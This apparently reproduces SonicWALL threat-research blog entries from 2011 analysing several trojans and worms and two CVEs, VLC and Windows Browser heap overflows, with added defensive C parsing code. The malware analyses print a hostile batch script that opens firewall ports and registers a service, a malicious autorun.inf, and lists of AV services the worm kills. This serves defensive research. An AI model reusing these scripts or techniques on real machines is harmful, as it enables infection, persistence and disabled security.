Tedroo Spam Trojan (Mar 11, 2011)

SonicWALL UTM Research discovered a newer variant of Tedroo trojan spreading in the wild. This variant of the Tedroo trojan was in turn found to be spamming the newer variant of Spyeye trojan. When the Tedroo trojan is downloaded and executed it performs the following activities:

  • It creates the following files:
    • %temp%\DATF2.tmp.exe (Copy of Itself) [Detected as GAV: Tedroo.AQ (Trojan)]
    • %windir%\system32\drivers\str.sys (encrypted data file)

  • It creates the following registry entry to ensure that the dropped malware runs as a service on every system reboot:
    • HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\hxwclmobypwlr: “%temp%\DATF2.tmp.exe”
  • It makes the following HTTP requests to a remote IP address:
    • POST /548/getcfg.php – This request returns a configuration file which is encrypted
    • GET /spm/s_get_host.php?ver=548 – This request returns the public IP address of the infected host
    • GET /spm/s_alive.php?id={removed}&tick=1691546&ver=548&smtp=ok&sl=1&fw=0&pn=0&psr=0
      It reports back information regarding the infected machine with various parameters. Some of the parameters used are:
      • id: random id for infected machine
      • tick: system uptime in milliseconds
      • ver: version of Tedroo
      • smtp: Returns “ok” if SMTP servers are reachable after checking connectivity to mail servers for Mail, Hotmail, Yahoo, Google and AOL
      • fw: returns firewall status
    • GET /spm/s_task.php?id={removed}&tid=38666 – This request returns a list of email addresses, email content to spam and other information

  • It spams the new Spyeye trojan. The email is crafted to appear like it originates from DHL:

    screenshot

  • The attachment in the email is a zip file which contains the following file:
    • doc.exe [Detected as GAV: Spyeye.Y (Trojan)]

SonicWALL Gateway AntiVirus provides protection against these threats via the following signatures:

GAV: Tedroo.AQ (Trojan)
GAV: Spyeye.Y (Trojan)


New banking Trojan – Tatanga (Mar 4, 2011)

SonicWALL UTM Research team received reports of a new banking Trojan named Tatanga in the wild. Spain, Germany, United States & United Kingdom are top countries affected by this Trojan.

This Trojan has many sophisticated features resembling functions found in the popular crimeware toolkits Zeus & SpyEye, which include:

  • Encrypted configuration files.
  • Encrypted communication between the bot and the Command & Control server.
  • Dynamic HTML injection affecting users of popular browsers like IE, Firefox, Chrome, Safari etc.
  • Disables AV applications.
  • Harvests e-mail addresses & other sensitive information.
  • Removes other malware infections, specifically Zeus.

Upon infection, the Trojan performs the following activities on the victim machine:

  • Injects itself into explorer.exe process and conceals its presence on the system. Logs information related to banking session including credentials & uploads it to a remote server.
  • Drops the following files:
    • %User Application Data%\Microsoft\Internet Explorer\report.exe <- Copy of itself [ Detected as: GAV: Tatanga.gen (Trojan) ]
    • %User Local Settings%\Temp\report.dll <- [ Detected as: GAV: Pincav.BAHA (Trojan) ]
    • %User Application Data%\Help\a.dll
    • %User Application Data%\Help\d.dll
    • %User Application Data%\Help\n.dll
    • %User Application Data%\Help\p.dll
    • The DLL files dropped in the Help directory are encrypted data files.

  • Attempts to communicate with C&C server via a predetermined list of compromised web sites.

  • Disables the host Antivirus application.
  • Adds the following registry entry to bypass firewall restrictions:
    • Key: [HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List] Value: “c:\windows\explorer.exe”
      Data: “c:\windows\explorer.exe:*:Enabled:explorer”

Screenshots showing some statistics from control panel used by this banking Trojan:

screenshot

screenshot

SonicWALL Gateway AntiVirus provides protection against this Trojan via the following signature:

  • GAV: Tatanga.gen (Trojan)

VideoLAN VLC Media Player Subtitle Heap BO (Mar 03, 2011)

VideoLAN is a project that develops software for playing video and other media formats across a local area network (LAN). It originally developed two programs for media streaming, VideoLAN Client (VLC) and VideoLAN Server (VLS), but most of the features of VLS have been incorporated into VLC, with the result renamed VLC media player. VLC media player is a free and open source media player and multimedia framework.

VLC media player can play many audio and video formats (MPEG, DivX, ogg, Wave etc.) as well as various streaming protocols. The Matroska Multimedia Container, an open standard, free container format, is one that can be played by VLC media player. The Matroska can hold an unlimited number of video, audio, picture or subtitle tracks inside a single file. It is intended to serve as a universal format for storing common multimedia content, like movies or TV shows. Matroska is similar in concept to other containers like AVI, MP4 or ASF, but is entirely open in specification, with many implementations in open source software. Matroska file types are .MKV for video (with subtitles and audio), .MKA for audio-only files and .MKS for subtitles only.

The Matroska file format is based on Extensible Binary Meta Language (EBML), a generalized file format similar to XML. The Matroska files only have two different top level elements, EBML and Segment. The Segment is the top level container for multimedia data. The Tracks element contains information about the tracks that are stored in the Segment, such as track type (audio, video, subtitles), the codec used, resolution and sample rate.

A heap buffer overflow vulnerability exists in VLC media player. When handling subtitles, the application can overflow a heap buffer through lack of bounds checking in the StripTags() function while processing strings that contain an opening "<" without the terminating ">". A remote attacker could exploit this vulnerability to overflow the heap buffer and inject arbitrary code. The injected code would run in the security context of the logged-in user.
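As an added illustration (not VLC's own code), a tag stripper for subtitle lines that handles the unterminated "<" case described above with explicit bounds checks; the choice to drop the dangling text after an unterminated "<" is an assumption made here.

```c
#include <stddef.h>
#include <string.h>

/* Copy `in` to `out` (capacity out_sz) with every "<...>" tag removed.
 * Returns the number of bytes written, or -1 if out is too small.
 * The scan for the closing '>' stops at the terminating NUL instead of
 * running past it, which is the missing bounds check the text describes
 * for StripTags(). Assumption: text after an unterminated '<' is dropped
 * rather than copied literally. */
int strip_tags(const char *in, char *out, size_t out_sz)
{
    size_t n = 0;
    if (in == NULL || out == NULL || out_sz == 0)
        return -1;
    for (const char *p = in; *p != '\0'; ++p) {
        if (*p == '<') {
            /* Unsafe pattern: while (*p != '>') ++p;   -- no NUL check.
             * strchr() stops at the NUL, so an unterminated tag cannot
             * drive the read pointer beyond the input string. */
            const char *close = strchr(p, '>');
            if (close == NULL)
                break;          /* unterminated tag: stop here */
            p = close;          /* the loop's ++p steps past the '>' */
            continue;
        }
        if (n + 1 >= out_sz) {  /* keep room for the terminator */
            out[n] = '\0';
            return -1;
        }
        out[n++] = *p;
    }
    out[n] = '\0';
    return (int)n;
}

/* 1 when the line contains a '<' with no '>' after it, i.e. the
 * malformed input class that triggers the described overflow. */
int has_unterminated_tag(const char *in)
{
    const char *lt = strrchr(in, '<');
    return lt != NULL && strchr(lt, '>') == NULL;
}

/* Check helper: strip into a local buffer and compare with `expected`. */
int strip_tags_equals(const char *in, const char *expected)
{
    char buf[128];
    return strip_tags(in, buf, sizeof buf) >= 0 && strcmp(buf, expected) == 0;
}

/* Check helper: 1 when an undersized output buffer is rejected. */
int strip_tags_rejects_small_buffer(const char *in, size_t out_sz)
{
    char buf[128];
    if (out_sz > sizeof buf)
        out_sz = sizeof buf;
    return strip_tags(in, buf, out_sz) == -1;
}
```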

The SonicWALL IPS team has researched the vulnerability and created the following IPS signatures to cover exploits related to it:

  • 6286 VideoLAN VLC Media Player Subtitle Heap BO Exploit 1
  • 6287 VideoLAN VLC Media Player Subtitle Heap BO Exploit 2

This vulnerability has been assigned CVE-2011-0522.

New Windows Live Messenger worm (Feb 25, 2011)

The SonicWALL UTM Research team received reports of a new variant of a Windows Live messenger Worm propagating in the wild. This Worm spreads by presenting various links to users on the MSN contact list of the compromised user. The Worm also downloads FakeAV software upon installation.

An unsuspecting user may receive a message over the MSN Messenger network containing a link to a malicious file:

Upon execution of the downloaded file, the FakeAV software will display the following pop-up:

It will perform a fake scan of the system:

Upon pressing “Yes” the Trojan will pop up a payment page in Internet Explorer for purchasing the FakeAV software:

The worm performs the following DNS queries:

  • www.startacademy.be
  • host5500.net

It downloads www.{removed}/bb.exe [Detected as GAV: Buzus.HAPC (Trojan)] and renames the file to 4417934.exe

The following files are dropped on the compromised system:

  • C:\Documents and Settings\{USER}\Application Data\msnsvconfig.txt
  • C:\Documents and Settings\{USER}\Local Settings\Temp\4417934.exe [Detected as GAV: Buzus.HAPC (Trojan)]
  • C:\Documents and Settings\{USER}\Microsoft-Driver-1-52-2475-9627-8645\winrsvn.exe [Detected as GAV: Buzus.HAPC (Trojan)]

Registry modification:

  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run  Microsoft(R) Service Update  “C:\Documents and Settings\{USER}\Microsoft-Driver-1-52-2475-9627-8645\winrsvn.exe”
  • HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List  C:\Documents and Settings\{USER}\Microsoft-Driver-1-52-2475-9627-8645\winrsvn.exe  “C:\Documents and Settings\{USER}\Microsoft-Driver-1-52-2475-9627-8645\winrsvn.exe:*:Enabled:Microsoft(R) Service Update”

SonicWALL Gateway AntiVirus provides protection against this malware via the following signatures:

  • GAV: Buzus.HAPC (Trojan)
  • GAV: IRCBot.DTO_2 (Trojan)

Koobface.HJV – Spreading in the wild (Feb 04, 2011)

The Sonicwall UTM Research team discovered a new malicious Worm spreading in the wild. The Worm spreads via Facebook profiles and as part of its post-infection activity, it installs Fake AVG antivirus security software.

The Worm performs the following DNS queries:


The Worm attempts to load various web pages using random page names with the .css extension:


The Worm installs the following files on the system:

  • C:\Documents and Settings\{USER}\Local Settings\Temp\feb.bat
  • C:\Documents and Settings\{USER}\Local Settings\Temp\zpskon_1296703528.exe [Detected as GAV: Koobface.FF (Trojan)]
  • C:\Documents and Settings\{USER}\Local Settings\Temp\zpskon_1296699165.exe [Detected as GAV: Delf.EM (Trojan)]
  • C:\WINDOWS\5456456z
  • C:\WINDOWS\bt7.dat
  • C:\WINDOWS\jjp156.exe [Detected as GAV: Koobface.HJV_2 (Worm)]
  • C:\WINDOWS\system32\feb.dll [Detected as GAV: Koobface.HJV_3 (Worm)]
  • C:\WINDOWS\system32\drivers\feb.sys [Detected as GAV: Koobface.FF (Trojan)]

feb.bat contains:

      netsh firewall add allowedprogram name="feb" program="C:\WINDOWS\system32\svchost.exe" mode=enable
      netsh firewall add portopening tcp 8087 feb enable
      sc create "ffeb" type= interact type= share start= auto binpath= "C:\WINDOWS\system32\svchost.exe -k ffeb"
      reg add "hklm\system\currentcontrolset\services\ffeb\parameters" /v servicedll /t reg_expand_sz /d "C:\WINDOWS\system32\feb.dll" /f
      reg add "hklm\system\currentcontrolset\services\ffeb" /v failureactions /t reg_binary /d 00000000000000000000000003000000140000000100000060ea00000100000060ea00000100000060ea0000 /f
      reg add "hklm\software\microsoft\windows nt\currentversion\svchost" /v ffeb /t reg_multi_sz /d "ffeb" /f
      sc start ffeb

feb.dll contains a list of URLs, all of which were either taken down or led to blank pages at the time of writing. Below is a sample of the URLs contained in feb.dll:


The worm installs the following registry keys to ensure startup of jjp156.exe and the feb.sys driver:

  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer  NoAutoUpdate  dword:00000001
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer  NoWindowsUpdate  dword:00000001
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SvcHost  ffeb  hex(7):66,66,65,62,00,00,
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run  dfg49df  “c:\windows\jjp156.exe”
  • HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_FEB  NextInstance  dword:00000001
  • HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_FEB000  Service  “feb”
  • HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\feb  ImagePath  hex(2):”\??\C:\WINDOWS\system32\drivers\feb.sys”

Upon installation the Worm informs the user that it needs to perform a “Scan” of the system:

It performs a fake system scan which is hosted on a Fake AV landing page:

  • http://3064972.greyzzsecure9.com/defender/?914ea0a274=vmzd&8a83854da2d=jjdjtamdvz&5f701=jvottyajzt

screenshot

When clicking on “Remove all” or “Cancel” it attempts to initiate the download of:

  • bitav_2053_ext6.exe [Detected as GAV: TDSS.ABCR (Trojan)]

The worm will periodically cause pop-up messages such as in the screenshot below:

When clicking OK to such pop-up messages the Worm will bring up further Fake AV pages which attempt to download more malware to the infected machine such as:

  • pack.exe [Detected as GAV: SecurityTool.W (Trojan)]

SonicWALL Gateway AntiVirus provides protection against this threat via the following signatures:

  • GAV: Koobface.HJV (Worm)
  • GAV: Koobface.HJV_2 (Worm)
  • GAV: Koobface.HJV_3 (Worm)
  • GAV: Koobface.FF (Trojan)
  • GAV: Delf.EM (Trojan)
  • GAV: TDSS.ABCR (Trojan)
  • GAV: SecurityTool.W (Trojan)

Buzus.GDEF – Mass-Mailing Worm (Feb 18, 2011)

SonicWALL UTM Research team received reports of a new variant of a mass-mailing worm propagating in the wild. This worm propagates through emails, P2P applications, network shares and removable drives.

Process of Infection:

An unsuspecting user may receive an email with the malware attachment. This worm can send emails as follows:

From: invitations@twitter.com
Subject: Your friend invited you to Twitter!
Attachment: Invitation Card.zip

    screenshot

From: order-update@amazon.com
Subject: Shipping update for your Amazon.com order
Attachment: Shipping documents .zip

    screenshot

From: update@facebookmail.com
Subject: You have got a new message on Facebook!
Attachment: Facebook message.zip

    screenshot

From: e-cards@hallmark.com
Subject: You have received A Hallmark E-Card!
Attachment: Postcard.zip

    screenshot

From: invitations@hi5.com
Subject: Laura would like to be your friend on hi5!
Attachment: Invitation Card.zip

    screenshot

From: resume-thanks@google.com
Subject: Thank you from Google!
Attachment: CV-20100120-112.zip

    screenshot

It may also send a phishing email:

    screenshot

Installation:

Once the user opens and executes the attachment, it will do the following:

Drops a copy of itself:

  • WINDOWS\system32\PCSuite.exe – [ detected as GAV: Buzus.GDEF (Trojan) ]
  • WINDOWS\system32\sta-css.exe – [ detected as GAV: (Cloud) Mufanom.APSW (Trojan) ]
  • WINDOWS\{random}.dll – [ detected as GAV: (Cloud) Mufanom.APSW (Trojan) ]
  • WINDOWS\system32\stat-cpe.exe – [ detected as GAV: Twain.A (Trojan) ]

Registry Changes

Adds the following registry entries to ensure that the malware runs on every system startup.

  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
    Value: Nokia Launch Application
    Data: “C:\WINDOWS\System32\PCSuite.exe”
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
    Value: Yravasaxog
    Data: “WINDOWS\w3dyu1.dll”,Startup

Adds the following registry entries as part of its installation:

  • Key: HKEY_CURRENT_USER\Software\Nokia4
  • Key: HKEY_LOCAL_MACHINE\Software\Nokia4
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer  nok01  “11”
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer  nok01  “24”
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system  EnableLUA  dword:00000000
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\UACDisableNotify  InNewValue  dword:00000001

Adds the following registry entry to bypass firewall restrictions:

  • Key: [HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List] Value: “C:\WINDOWS\system32\PCSuite.exe”
    Data: “C:\WINDOWS\system32\PCSuite.exe:*:Enabled:Explorer”

Mutex

Creates the following mutex to ensure that only a single instance is running in memory:

  • PCSuite.exeDm28sf0V@XK$NX8hOu

Propagation

Removable Drives

Drops an Autorun.inf and a copy of itself as redmond.exe on removable drives:

    [autorun]
    open=RECYCLER\S-1-6-21-2434476521-1645641927-702000330-1542\redmond.exe
    icon=%SystemRoot%\system32\SHELL32.dll,4
    action=Open folder to view files
    shell\open=Open
    shell\open\command=RECYCLER\S-1-6-21-2434476521-1645641927-702000330-1542\redmond.exe
    shell\open\default=1

Peer-2-Peer Application

May copy itself into the following folders using the filenames listed below:

Folder:

  • C:\program files\icq\shared folder
  • C:\program files\grokster\my grokster
  • C:\program files\emule\incoming
  • C:\program files\morpheus\my shared folder
  • C:\program files\limewire\shared
  • C:\program files\tesla\files
  • C:\program files\winmx\shared
  • C:\Downloads

Filename:

  • Ad-aware 2010.exe
  • Adobe Acrobat Reader keygen.exe
  • Adobe Illustrator CS4 crack.exe
  • Adobe Photoshop CS5 crack.exe
  • Alcohol 120 v1.9.7.exe
  • Anti-Porn v13.5.12.29.exe
  • AnyDVD HD v.6.3.1.8 Beta incl crack.exe
  • Ashampoo Snap 3.02.exe
  • AVS Video Converter v6.3.1.365 CRACKED.exe
  • BitDefender AntiVirus 2010 Keygen.exe
  • Blaze DVD Player Pro v6.52.exe
  • CleanMyPC Registry Cleaner v6.02.exe
  • Daemon Tools Pro 4.50.exe
  • Divx Pro 7 + keymaker.exe
  • Download Accelerator Plus v9.exe
  • Download Boost 2.0.exe
  • DVD Tools Nero 10.5.6.0.exe
  • G-Force Platinum v3.7.5.exe
  • Google SketchUp 7.1 Pro.exe
  • Grand Theft Auto Episodes From Liberty City 2010.exe
  • Image Size Reducer Pro v1.0.1.exe
  • Internet Download Manager V5.exe
  • Kaspersky AntiVirus 2010 crack.exe
  • K-Lite Mega Codec v5.5.1.exe
  • K-Lite Mega Codec v5.6.1 Portable.exe
  • LimeWire Pro v4.18.3.exe
  • MagicISO Magic ISO Maker v5.5.0276 Cracked.exe
  • McAfee Total Protection 2010.exe
  • Microsoft.Windows 7 ULTIMATE FINAL activator+keygen x86.exe
  • Motorola
  • Mp3 Splitter and Joiner Pro v3.48.exe
  • ms09-067.exe
  • Myspace theme collection.exe
  • Nero 9 9.2.6.0 keygen.exe
  • Norton Anti-Virus 2010 crack.exe
  • Norton Internet Security 2010 crack.exe
  • PCSuite.exe
  • PDF password remover (works with all acrobat reader).exe
  • PDF to Word Converter 3.0.exe
  • PDF Unlocker v2.0.3.exe
  • PDF-XChange Pro.exe
  • Power ISO v4.2 + keygen axxo.exe
  • Rapidshare Auto Downloader 3.8.exe
  • RapidShare Killer AIO 2010.exe
  • Sony Vegas Pro v9.0a incl crack.exe
  • Sophos antivirus updater bypass.exe
  • Starcraft2 battle.net key generator.exe
  • Starcraft2 battle.net keys.txt.exe
  • Starcraft2.exe
  • Starcraft2 REGION-UNLOCKER.exe
  • Starcraft2 SERVER-CHANGER.exe
  • Super Utilities Pro 2009 11.0.exe
  • Total Commander7 license+keygen.exe
  • Trojan Killer v2.9.4173.exe
  • Tuneup Ultilities 2010.exe
  • Twitter FriendAdder 2.1.1.exe
  • Uniblue RegistryBooster 2010.exe
  • VmWare 7.0 keygen.exe
  • VmWare keygen.exe
  • Winamp.Pro.v7.33.PowerPack.Portable+installer.exe
  • Windows 2008 Enterprise Server VMWare Virtual Machine.exe
  • Windows2008 keygen and activator.exe
  • Windows 7 Ultimate keygen.exe
  • Windows XP PRO Corp SP3 valid-key generator.exe
  • WinRAR v3.x keygen RaZoR.exe
  • YouTubeGet 5.4.exe
  • Youtube Music Downloader 1.0.exe

Email Propagation

Harvests email addresses from files with the following extensions:

  • asp
  • dbx
  • doc
  • htm
  • log
  • lst
  • nfo
  • php
  • rtf
  • txt
  • wab
  • wpd
  • wps
  • xls
  • xml

It avoids sending email to addresses containing the following strings:

  • .com
  • .gov
  • .mil
  • abuse
  • acd-group
  • acdnet.com
  • acdsystems.com
  • acketst
  • admin
  • ahnlab
  • alcatel-lucent.com
  • anyone
  • apache
  • arin.
  • avg.comsysinternals
  • avira
  • badware
  • berkeley
  • bitdefender
  • bluewin.ch
  • borlan
  • bpsoft.com
  • bsd
  • bugs
  • buyrar.com
  • ca
  • certific
  • cisco
  • clamav
  • contact
  • debian
  • drweb
  • eset.com
  • example
  • f-secure
  • fido
  • firefox
  • fsf.
  • ghisler.com
  • gimp
  • gnu
  • gold-certs
  • gov.
  • help
  • honeynet
  • honeypot
  • iana
  • ibm.com
  • icrosoft
  • idefense
  • ietf
  • ikarus
  • immunityinc.com
  • info
  • inpris
  • isc.o
  • isi.e
  • jgsoft
  • kaspersky
  • kernel
  • lavasoft
  • linux
  • listserv
  • mcafee
  • me
  • messagelabs
  • mit.e
  • mozilla
  • mydomai
  • no
  • nobody
  • nodomai
  • noone
  • not
  • nothing
  • novirusthanks
  • ntivi
  • nullsoft.org
  • page
  • panda
  • pgp
  • postmaster
  • prevx
  • privacy
  • qualys
  • quebecor.com
  • rating
  • redhat
  • rfc-ed
  • root
  • ruslis
  • sales
  • samba
  • samples
  • secur
  • security
  • sendmail
  • service
  • site
  • slashdot
  • soft
  • somebody
  • someone
  • sopho
  • sourceforge
  • spam
  • spm
  • ssh.com
  • submit
  • sun.com
  • support
  • suse
  • syman
  • tanford.e
  • the.bat
  • unix
  • usenet
  • utgers.ed
  • virus
  • virusbuster
  • webmaster
  • websense
  • winamp
  • winpcap
  • wireshark
  • www.ca.com
  • www
  • you
  • your

Queries the available mail exchange (MX) server to send the email:

    screenshot

Other System Modification:

Deletes files from the following directory:

  • Program Files\prevx

Deletes files related to the following registry entries:

  • HKEY_LOCAL_MACHINE\SOFTWARE\McAfee\AVEngine  szInstallDir = “mcshield.exe”
  • HKEY_LOCAL_MACHINE\SOFTWARE\Malwarebytes’ Anti-Malware  InstallPath = *.*”

Terminates the following services related to AV security software:

  • AVP
  • AntiVirSchedulerService
  • Arrakis3
  • CSIScanner
  • CaCCProvSP
  • ERSvc
  • Ehttpsrv
  • Emproxy
  • FPAVServer
  • GWMSRV
  • K7EmlPxy
  • K7RTScan
  • K7TSMngr
  • LIVESRV
  • LiveUpdate Notice Service
  • MBAMService
  • MCNASVC
  • MPFSERVICE
  • MPS9
  • McAfee HackerWatch Service
  • Norton AntiVirus
  • PANDA SOFTWARE CONTROLLER
  • PAVFNSVR
  • PAVPRSRV
  • PAVSVR
  • PSHOST
  • PSIMSVC
  • PSKSVCRETAIL
  • RSCCenter
  • RSRavMon
  • SAVScan
  • SUM
  • Savadminservice
  • Savservice
  • Sophos Agent
  • Sophos Autoupdate Service
  • Sophos Certification Manager
  • Sophos Management Service
  • Sophos Message Router
  • Symantec Core LC
  • TPSRV
  • ThreatFire
  • VSSERV
  • WerSvc
  • WinDefend
  • XCOMM
  • antivirservice
  • avast! Antivirus
  • avast! Mail Scanner
  • avast! Web Scanner
  • avg8emc
  • avg8wd
  • bdss
  • ccEvtMgr
  • ccproxy
  • ccpwdsvc
  • ccsetmgr
  • ekrn
  • liveupdate
  • mcODS
  • mcmisupdmgr
  • mcmscsvc
  • mcpromgr
  • mcproxy
  • mcredirector
  • mcshield
  • mcsysmon
  • msk80service
  • navapsvc
  • npfmntor
  • nscservice
  • sbamsvc
  • scan
  • sdauxservice
  • sdcodeservice
  • sndsrvc
  • spbbcsvc
  • wscsvc

C&C Server

Sends information to the following remote server:

    153.26.137.241

Anti-debugging Technique

Checks for the following SoftICE debugger devices:

  • \\.\SICE
  • \\.\NTICE
  • \\.\SIWVIDSTART

Anti-VMware:

Checks whether it is running in VMware by looking for the following device:

  • \\.\VMDRV

SonicWALL Gateway AntiVirus provides protection against this worm via the following signatures:

GAV: Buzus.GDEF (Trojan)
GAV: Twain.A (Trojan)
GAV: Mufanom.APSW (Trojan)
GAV: (Cloud) Mufanom.APSW (Trojan)


MS Windows Active Directory BO (Feb 18, 2011)

Microsoft Windows Active Directory is a directory service running on Windows domain controllers. Active Directory utilizes the Computer Browser service technology to collect, distribute, and obtain information about workgroups, domains, and individual hosts on a network.

The Computer Browser service typically uses connectionless server broadcasts to communicate between nodes. Registration, announcements, and browser elections are performed by the service to provide the network with a list of available resources. Individual nodes on a browser system play various browser roles. There are five browse service roles that computers can play in the browser system:

  • Non-Browser
  • Potential Browser
  • Backup Browse Server
  • Master Browse Server
  • Domain Master Browser

All Windows Server 2003 domain controllers are configured as either master browse servers or backup browse servers. A server broadcasts a Host Announcement message on startup to announce its presence to the master browse server. The process of adding a new server entry to the master browse server’s browse list is called registration. In the case where there is no WINS server, all name registrations as well as name lookups are done by UDP broadcast. Where a WINS server is used, the Windows client will use UDP unicast to register with the WINS server. This name is registered by the master browse server and is used to broadcast and receive domain announcements on the local subnet. A Browser Election takes place to select a new master browse server under the following circumstances:

  • A host cannot locate a master browse server
  • A preferred master browse server comes online
  • A Windows-based domain controller starts
  • A backup browse server cannot contact the master browse server

A computer initiates an election by broadcasting a Browser Election Request. The Browser Election Request is transmitted over SMB. This request has the following format:

    Offset  Size  Description
    ------  ----  -----------------------------------
    0x0000  1     Command
    0x0001  1     Election Version
    0x0002  4     Election Criteria
    0x0006  4     Client uptime
    0x000A  4     Unused
    0x000E  N     Null-terminated ASCII server name

If a browser receives this request with a lower ranking of election criteria than its own, then the browser sends its own Browser Election Request. If the browser does not have a higher ranking value then the browser attempts to determine which computer is the new master browse server.

A heap overflow vulnerability exists in Microsoft Windows Server 2003 when configured as an Active Directory server. The vulnerability is due to a boundary error in the kernel component of the Windows Browser service that is responsible for handling incoming Browser Election Requests. The vulnerable code fails to properly handle overly long ServerName field values. When an overly long ServerName field is encountered, the code allocates a fixed-size buffer to store multiple fields, starting with the ServerName field. A ServerName field that is longer than the allowable size causes the calculated size of the remainder of the buffer to be zero. Later in the process flow, this zero size is decreased by one, causing an integer underflow. The code performs additional calculations on the value and then uses the final value as the size for a double-word copy operation into the aforementioned buffer. The copy operation overruns the buffer and corrupts memory. This condition can potentially lead to overwritten function pointers and code injection and execution. Successful exploitation may lead to kernel-level code injection and execution. Unsuccessful code execution attempts may cause the target system to crash, leading to a system-wide denial of service condition.
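A bounds-checked parser for the election request layout tabulated above, together with a check that mirrors the remainder-size calculation described in this paragraph (added example, not Microsoft's code; the 0x20-byte scratch-buffer size and the 15-character server-name limit are assumptions):

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>

/* Layout from the table above. */
#define ELECTION_HDR_LEN  0x0E   /* command .. unused; the name starts at 0x0E */
#define SCRATCH_BUF_LEN   0x20   /* assumed size of the fixed buffer in the text */
#define MAX_SERVER_NAME   15     /* NetBIOS host-name length limit (assumption) */

struct election_request {
    uint8_t     command;
    uint8_t     version;
    uint32_t    criteria;
    uint32_t    uptime;
    const char *server_name;    /* points into the caller's frame */
    size_t      name_len;       /* bytes before the NUL */
};

static uint32_t le32(const uint8_t *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Returns 0 on success, -1 if the frame is truncated or the server name
 * is not NUL-terminated inside the frame. */
int parse_election_request(const uint8_t *buf, size_t len,
                           struct election_request *out)
{
    if (buf == NULL || out == NULL || len <= ELECTION_HDR_LEN)
        return -1;
    const uint8_t *name = buf + ELECTION_HDR_LEN;
    const uint8_t *nul  = memchr(name, '\0', len - ELECTION_HDR_LEN);
    if (nul == NULL)
        return -1;               /* name runs off the end of the frame */
    out->command     = buf[0x00];
    out->version     = buf[0x01];
    out->criteria    = le32(buf + 0x02);
    out->uptime      = le32(buf + 0x06);
    out->server_name = (const char *)name;
    out->name_len    = (size_t)(nul - name);
    return 0;
}

/* Models the size calculation the text describes: the remainder of the
 * fixed buffer after ServerName is (buffer size - name - NUL), clamped to
 * zero for an overly long name; the later "remainder - 1" then wraps.
 * Returns 1 when a name of this length would reach that state. */
int name_would_underflow(size_t name_len)
{
    size_t remainder = (name_len + 1 < SCRATCH_BUF_LEN)
                     ? SCRATCH_BUF_LEN - name_len - 1 : 0;
    size_t next = remainder - 1;            /* wraps when remainder == 0 */
    return next > SCRATCH_BUF_LEN;          /* a wrapped value is huge */
}

/* Defender-side check: 1 only for frames whose name parses cleanly and
 * respects the NetBIOS limit, so a fixed buffer can never be overrun. */
int election_request_is_sane(const uint8_t *buf, size_t len)
{
    struct election_request req;
    if (parse_election_request(buf, len, &req) != 0)
        return 0;
    return req.name_len > 0 && req.name_len <= MAX_SERVER_NAME;
}

/* Builds a constructed frame (command 0x08, version 1, criteria 0x20,
 * uptime 10000 ms) carrying `name`; returns the frame length or 0. */
size_t build_sample_frame(uint8_t *buf, size_t cap, const char *name)
{
    size_t nlen = strlen(name);
    if (cap < ELECTION_HDR_LEN + nlen + 1)
        return 0;
    memset(buf, 0, ELECTION_HDR_LEN);
    buf[0x00] = 0x08;
    buf[0x01] = 0x01;
    buf[0x02] = 0x20;                        /* criteria, little-endian */
    buf[0x06] = 0x10; buf[0x07] = 0x27;      /* uptime 0x2710 = 10000 */
    memcpy(buf + ELECTION_HDR_LEN, name, nlen + 1);
    return ELECTION_HDR_LEN + nlen + 1;
}

/* Runs the parser over a well-formed frame and an overlong one. */
int self_check(void)
{
    uint8_t frame[128];
    struct election_request req;
    size_t len = build_sample_frame(frame, sizeof frame, "DC01");
    if (len != 19 || parse_election_request(frame, len, &req) != 0)
        return 0;
    if (req.command != 0x08 || req.criteria != 0x20 ||
        req.uptime != 10000 || req.name_len != 4)
        return 0;
    if (!election_request_is_sane(frame, len))
        return 0;
    /* 40-byte name: parses (it is terminated) but fails the length check */
    len = build_sample_frame(frame, sizeof frame,
                             "AAAAAAAAAA" "AAAAAAAAAA" "AAAAAAAAAA" "AAAAAAAAAA");
    if (election_request_is_sane(frame, len))
        return 0;
    /* Same frame with the NUL cut off: the parser must refuse it */
    if (parse_election_request(frame, len - 1, &req) != -1)
        return 0;
    return 1;
}
```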

SonicWALL has released an IPS signature to detect and block generic attack attempts targeting this vulnerability. The following signature has been released:

  • 6253 MS Windows Active Directory BROWSER ELECTION BO Attempt

In addition to this threat-specific signature, SonicWALL routinely releases generic signatures that detect frequently used byte patterns in exploitation attempts of vulnerabilities such as this one.

This vulnerability has been assigned the identifier CVE-2011-0654 by MITRE.

Valentine's day FakeAV woes (Feb 11, 2011)

SonicWALL UTM Research team discovered instances of polluted results appearing in search engine results for Valentine’s Day related search terms. Malware authors often use SEO poisoning campaigns to lure unsuspecting users into following malicious links strategically placed in search engine results. We observed similar campaigns in the past for “Wikileaks” and “Holiday Shopping” related keywords. It is evident from the new instances of polluted results that malware authors have updated their landing page and associated FakeAV executables. The search term “Valentines Day Gifts” leads users to the polluted search result shown below:

screenshot

